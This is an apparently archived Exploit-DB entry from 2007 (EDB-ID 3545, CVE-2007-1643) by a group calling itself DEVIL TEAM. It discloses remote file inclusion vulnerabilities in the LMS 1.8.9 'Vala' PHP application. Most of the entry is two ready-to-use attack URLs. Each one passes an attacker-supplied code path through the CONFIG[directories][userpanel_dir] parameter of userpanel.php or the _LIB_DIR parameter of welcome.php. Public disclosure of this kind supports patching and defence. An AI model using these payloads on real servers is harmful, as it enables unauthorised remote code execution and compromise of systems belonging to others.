Lms <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

2007-03-22T00:00:00
ID EDB-ID:3545
Type exploitdb
Reporter Kacper
Modified 2007-03-22T00:00:00

Description

LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities. CVE-2007-1643. Webapps exploit for php platform

                                        
                                            DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.


LMS &lt;= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/


--------------------------------------------
Vulnerabilities:

http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]

# milw0rm.com [2007-03-22]